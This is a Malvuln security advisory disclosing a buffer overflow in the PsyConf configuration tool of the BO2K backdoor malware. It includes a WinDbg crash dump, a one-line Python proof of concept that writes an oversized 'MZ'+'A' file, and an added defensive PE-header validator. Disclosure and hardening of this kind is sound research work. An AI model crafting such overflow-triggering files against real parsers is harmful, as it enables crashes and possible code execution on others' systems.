Backdoor.Win32.BO2K.ab Buffer Overflow

Backdoor.Win32.BO2K.ab malware suffers from a buffer overflow vulnerability.


MD5 | 5841f3755afe2d24405abcde392b1f87

Discovery / credits: Malvuln - malvuln.com (c) 2021
Original source: https://malvuln.com/advisory/ca4e5a6ff033b62fa59de5a5dd24c7f9.txt
Contact: [email protected]
Media: twitter.com/malvuln

Threat: Backdoor.Win32.BO2K.ab
Vulnerability: Local File Buffer Overflow
Description: PsyConf - Program configuration tool doesn't properly check the executables it parses. Loading a specially crafted file triggers a buffer overflow that overwrites the ECX register, among others.
Type: PE32
MD5: ca4e5a6ff033b62fa59de5a5dd24c7f9
Vuln ID: MVID-2021-0119
Dropped files:
ASLR: False
DEP: False
Safe SEH: True
Disclosure: 03/02/2021

Memory Dump:
(414.e80): Unknown exception - code c000041d (first/second chance not available)
eax=001c0000 ebx=023655c0 ecx=41414141 edx=00000000 esi=0019fe0c edi=74de3cf0
eip=00401e17 esp=0019f3c0 ebp=0019f604 iopl=0 nv up ei pl nz na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010206
*** WARNING: Unable to verify checksum for Backdoor.Win32.BO2K.ab.ca4e5a6ff033b62fa59de5a5dd24c7f9.exe
*** ERROR: Module load completed but symbols could not be loaded for Backdoor.Win32.BO2K.ab.ca4e5a6ff033b62fa59de5a5dd24c7f9.exe
Backdoor_Win32_BO2K_ab_ca4e5a6ff033b62fa59de5a5dd24c7f9+0x1e17:
00401e17 8b540150 mov edx,dword ptr [ecx+eax+50h] ds:002b:415d4191=????????


0:000> !analyze -v
*******************************************************************************
* *
* Exception Analysis *
* *
*******************************************************************************


FAULTING_IP:
Backdoor_Win32_BO2K_ab_ca4e5a6ff033b62fa59de5a5dd24c7f9+1e17
00401e17 8b540150 mov edx,dword ptr [ecx+eax+50h]

EXCEPTION_RECORD: ffffffff -- (.exr 0xffffffffffffffff)
ExceptionAddress: 00401e17 (Backdoor_Win32_BO2K_ab_ca4e5a6ff033b62fa59de5a5dd24c7f9+0x00001e17)
ExceptionCode: c000041d
ExceptionFlags: 00000001
NumberParameters: 0

PROCESS_NAME: Backdoor.Win32.BO2K.ab.ca4e5a6ff033b62fa59de5a5dd24c7f9.exe

ERROR_CODE: (NTSTATUS) 0xc000041d - An unhandled exception was encountered during a user callback.

EXCEPTION_CODE: (NTSTATUS) 0xc000041d - An unhandled exception was encountered during a user callback.

MOD_LIST: <ANALYSIS/>

NTGLOBALFLAG: 0

APPLICATION_VERIFIER_FLAGS: 0

FAULTING_THREAD: 00000e80

BUGCHECK_STR: APPLICATION_FAULT_FILL_PATTERN_41414141

PRIMARY_PROBLEM_CLASS: FILL_PATTERN_41414141

DEFAULT_BUCKET_ID: FILL_PATTERN_41414141

LAST_CONTROL_TRANSFER: from 0040ff6f to 00401e17

STACK_TEXT:
WARNING: Stack unwind information not available. Following frames may be wrong.
0019f604 0040ff6f 0019fe0c 000003e8 00000000 Backdoor_Win32_BO2K_ab_ca4e5a6ff033b62fa59de5a5dd24c7f9+0x1e17
0019f634 004103af 000003e8 00000000 00000000 Backdoor_Win32_BO2K_ab_ca4e5a6ff033b62fa59de5a5dd24c7f9+0xff6f
0019f658 00412819 000003e8 00000000 00000000 Backdoor_Win32_BO2K_ab_ca4e5a6ff033b62fa59de5a5dd24c7f9+0x103af
0019f6a8 00412258 00000000 000a07fe 0019fe0c Backdoor_Win32_BO2K_ab_ca4e5a6ff033b62fa59de5a5dd24c7f9+0x12819
0019f724 0041220a 00000111 000003e8 000a07fe Backdoor_Win32_BO2K_ab_ca4e5a6ff033b62fa59de5a5dd24c7f9+0x12258
0019f744 00411325 00000111 000003e8 000a07fe Backdoor_Win32_BO2K_ab_ca4e5a6ff033b62fa59de5a5dd24c7f9+0x1220a
0019f7a4 0041152d 00000000 001307ba 00000111 Backdoor_Win32_BO2K_ab_ca4e5a6ff033b62fa59de5a5dd24c7f9+0x11325
0019f7c0 761147ab 001307ba 00000111 000003e8 Backdoor_Win32_BO2K_ab_ca4e5a6ff033b62fa59de5a5dd24c7f9+0x1152d
0019f7ec 760f52ac 00411502 001307ba 00000111 user32!_InternalCallWinProc+0x2b
0019f8d0 760f4e4a 00411502 00000000 00000111 user32!UserCallWinProcCheckWow+0x3ac
0019f934 760fe4cf 00c8edc0 00000000 00000111 user32!DispatchClientMessage+0xea
0019f970 770e537d 0019f98c 00000020 0019fc5c user32!__fnDWORD+0x3f
0019f9a8 76052c0c 760f4c18 001307ba 00000111 ntdll!KiUserCallbackDispatcher+0x4d
0019f9ac 760f4c18 001307ba 00000111 000003e8 win32u!NtUserMessageCall+0xc
0019fa10 760f4723 00c8edc0 00000000 000a07fe user32!SendMessageWorker+0x3b8
0019fa44 761303ee 001307ba 00000111 000003e8 user32!SendMessageW+0x123
0019fa68 761300f3 00ca0690 00000000 00000000 user32!xxxButtonNotifyParent+0x54
0019fa90 7612f5f8 004ed7f0 00000000 00ca0690 user32!xxxBNReleaseCapture+0x141
0019fb30 7612ea92 00ca0690 00000000 00000202 user32!ButtonWndProcWorker+0xad8
0019fb5c 761147ab 000a07fe 00000202 00000000 user32!ButtonWndProcA+0x52
0019fb88 760f52ac 7612ea40 000a07fe 00000202 user32!_InternalCallWinProc+0x2b
0019fc6c 760f43fe 7083c410 00007ffb 00000202 user32!UserCallWinProcCheckWow+0x3ac
0019fce0 760f8401 00000000 004205e8 004205e0 user32!DispatchMessageWorker+0x20e
0019fd14 76110d5e 001307ba 004205e0 004205e0 user32!IsDialogMessageW+0x101
0019fd40 00413a80 001307ba 004205e0 0019fe0c user32!IsDialogMessageA+0x4e
004205e0 00000000 00000000 00140028 4a60bbbc Backdoor_Win32_BO2K_ab_ca4e5a6ff033b62fa59de5a5dd24c7f9+0x13a80


FOLLOWUP_IP:
Backdoor_Win32_BO2K_ab_ca4e5a6ff033b62fa59de5a5dd24c7f9+1e17
00401e17 8b540150 mov edx,dword ptr [ecx+eax+50h]

SYMBOL_STACK_INDEX: 0

SYMBOL_NAME: Backdoor_Win32_BO2K_ab_ca4e5a6ff033b62fa59de5a5dd24c7f9+1e17

FOLLOWUP_NAME: MachineOwner

MODULE_NAME: Backdoor_Win32_BO2K_ab_ca4e5a6ff033b62fa59de5a5dd24c7f9

IMAGE_NAME: Backdoor.Win32.BO2K.ab.ca4e5a6ff033b62fa59de5a5dd24c7f9.exe

DEBUG_FLR_IMAGE_TIMESTAMP: 396c698b

STACK_COMMAND: dt ntdll!LdrpLastDllInitializer BaseDllName ; dt ntdll!LdrpFailureData ; ~0s; .ecxr ; kb

FAILURE_BUCKET_ID: FILL_PATTERN_41414141_c000041d_Backdoor.Win32.BO2K.ab.ca4e5a6ff033b62fa59de5a5dd24c7f9.exe!Unknown

BUCKET_ID: APPLICATION_FAULT_FILL_PATTERN_41414141_Backdoor_Win32_BO2K_ab_ca4e5a6ff033b62fa59de5a5dd24c7f9+1e17


Exploit/PoC:
python -c "print( 'MZ'+'A'*72000)" > dirty0tis.exe
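An added example (not code from the advisory or from Malvuln) of the bounds-checked PE header parsing that PsyConf is described as lacking: every file offset is validated against the file length before it is dereferenced, so a file shaped like the PoC above ('MZ' followed by a run of 'A') is rejected with a reason instead of driving an out-of-bounds read. It assumes the standard IMAGE_DOS_HEADER / IMAGE_NT_HEADERS layout; both inputs below are constructed here.

```python
import struct

# Constructed input mirroring the advisory's PoC shape: a valid MZ signature and
# nothing but 'A' bytes after it, so every header field reads as 0x41414141.
POC_LIKE = b"MZ" + b"A" * 72000


def validate_pe_headers(data: bytes) -> tuple[bool, str]:
    """Return (ok, reason). Each offset taken from the file is range-checked
    against len(data) before it is used, which is the missing check."""
    if len(data) < 64:
        return False, "shorter than IMAGE_DOS_HEADER (64 bytes)"
    if data[:2] != b"MZ":
        return False, "missing MZ signature"
    # e_lfanew: signed 32-bit offset of the PE header, stored at DOS header offset 0x3C.
    # In the PoC it is 0x41414141, the value seen in ECX in the crash dump above.
    (e_lfanew,) = struct.unpack_from("<i", data, 0x3C)
    if e_lfanew < 64 or e_lfanew + 24 > len(data):
        return False, f"e_lfanew 0x{e_lfanew & 0xFFFFFFFF:08x} points outside the file"
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        return False, "missing PE\\0\\0 signature at e_lfanew"
    # IMAGE_FILE_HEADER (20 bytes) follows the 4-byte signature.
    machine, nsections, _ts, _symoff, _nsyms, opt_size, _chars = struct.unpack_from(
        "<HHIIIHH", data, e_lfanew + 4
    )
    # Section table starts after the optional header; 40 bytes per IMAGE_SECTION_HEADER.
    sect_table = e_lfanew + 24 + opt_size
    if nsections > 96 or sect_table + nsections * 40 > len(data):
        return False, "section table extends past end of file"
    return True, f"ok: machine=0x{machine:04x}, {nsections} section(s)"


def build_minimal_pe() -> bytes:
    """Constructed, header-only i386 image (no optional header, one empty
    section) used to exercise the accepting path."""
    dos = bytearray(64)
    dos[:2] = b"MZ"
    struct.pack_into("<i", dos, 0x3C, 64)  # PE header immediately after the DOS header
    file_hdr = struct.pack("<HHIIIHH", 0x14C, 1, 0, 0, 0, 0, 0x0102)
    return bytes(dos) + b"PE\0\0" + file_hdr + bytes(40)


if __name__ == "__main__":
    for name, blob in (("poc-like", POC_LIKE), ("minimal", build_minimal_pe())):
        print(name, validate_pe_headers(blob))
```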


Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).
